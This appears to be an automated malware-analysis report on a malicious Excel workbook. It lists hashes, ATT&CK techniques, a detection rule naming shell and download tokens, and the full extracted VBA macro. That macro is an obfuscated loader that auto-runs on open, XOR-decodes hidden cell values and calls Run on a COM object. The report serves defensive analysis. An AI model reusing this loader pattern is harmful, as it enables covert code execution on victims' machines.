Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 404b3b8eb3635f2d…

MALICIOUS

Office (OLE) / .XLS

Size: 39.5 KB
Created: 2023-07-04 22:30:35
Authoring application: Microsoft Excel
First seen: 2023-07-08
MD5: 3db8c3a6ca366ce4edb106056e2cee19
SHA-1: 7c74f6035d40d14be759f0e46d418c718e1bc900
SHA-256: 404b3b8eb3635f2d7d25794af53ee63870b8fa8b9f85e5cf65890964ffedd8b4
Risk score: 148

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

This Excel file contains VBA macros, including a Workbook_Open event handler, so code runs automatically when the workbook is opened. The heuristics flag the use of CreateObject and GetObject, which together instantiate a COM object that is then used to run further code. The macro's AlphAbeticAl subroutine calls Towns.Run on that object, which most likely launches a second-stage payload. The arguments to SuperviSion are read from cells J118, H102, H163 and F159 of sheet t66de and decoded by the Mozilla and Verified routines, which parse the cell text as hex bytes and XOR them with the repeating key "ub385e8cd2"; those cell contents are not included in this report, so the decoded GetObject moniker, CreateObject class and Run command are unknown, and the obfuscation prevents a more detailed analysis of the payload's exact function.

Heuristics (5)

  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
    Set Towns = GetObject(Athletics).CreateObject(Horizontal)
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject call
    Matched line in script:
    Set Towns = GetObject(Athletics).CreateObject(Horizontal)
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (low) OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script:
    Sub Workbook_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4378 bytes
SHA-256: 9441b863e94d632df9854b80400ef07e1b4214516e12130c4afd4054be60b2a1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private Towns As Object

Private Sub SuperviSion(ByVal Athletics As String, ByVal Climbing As String, ByVal Horizontal As String, ByVal Loves As String)
    Coding Athletics, Horizontal
    AlphAbeticAl Towns, Loves, Climbing
End Sub

Sub AlphAbeticAl(ByVal Towns As Object, ByVal Loves As String, ByVal Climbing As String)
    Towns.Run Climbing, 0
End Sub

Private Function Mozilla(ByVal Loving As String) As Variant
    Dim CorreCtion As Long: CorreCtion = 0: Dim Pointed() As Byte
    Dim ArtificiAl() As Byte, ConneCtor As String, Selecting As Integer, TiTTen As Integer, Permits As Integer
    ArtificiAl = "ub385e8cd2"
    GoTo BaBies
Northeast:
    If CorreCtion < UBound(Pointed) Then
        Selecting = CorreCtion Mod (10)
        Permits = ArtificiAl(Selecting * 2)
        TiTTen = Pointed(CorreCtion)
        GoTo Rapidly
SiSterS:
        ConneCtor = ConneCtor & Chr(Pointed(CorreCtion))
        CorreCtion = CorreCtion + 1
        GoTo Northeast
    Else
        GoTo Genuine
    End If
Genuine:
    Mozilla = ConneCtor
    Exit Function
BaBies:
    Pointed = Verified(Loving)
    GoTo Northeast
Rapidly:
    Pointed(CorreCtion) = Abs(TiTTen Xor Permits)
    GoTo SiSterS
End Function

Sub Coding(ByVal Athletics As String, ByVal Horizontal As String)
    Set Towns = GetObject(Athletics).CreateObject(Horizontal)
End Sub

Sub Workbook_Open()
    SuperviSion Mozilla(Sheets("t66de").Range("J118").Value), Mozilla(Sheets("t66de").Range("H102").Value), Mozilla(Sheets("t66de").Range("H163").Value), Mozilla(Sheets("t66de").Range("F159").Value)
End Sub

Private Function Verified(ByVal Answered As String) As Variant
    Dim ConneCtor() As Byte, i As Long, Selecting As Integer, Crowd As Integer
    Crowd = Len(Answered) / 2: i = 0: ReDim ConneCtor(0 To Crowd) As Byte
Permits:
    If i < Len(Answered) Then
        Selecting = Selecting + 1
        ConneCtor(Selecting - 1) = Chr((20 - 6) + (((8 - 2) * 2) * 2)) & Chr((((32 / 4) * 2) + (4 * 5)) * 2) & Mid(Answered, i + 1, 2)
        i = i + 2
        GoTo Permits
    Else
        GoTo Kennedy
        Dim Rapidly As String
        Rapidly = InputBox("celp lape")
    End If
Kennedy:
    Verified = ConneCtor
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True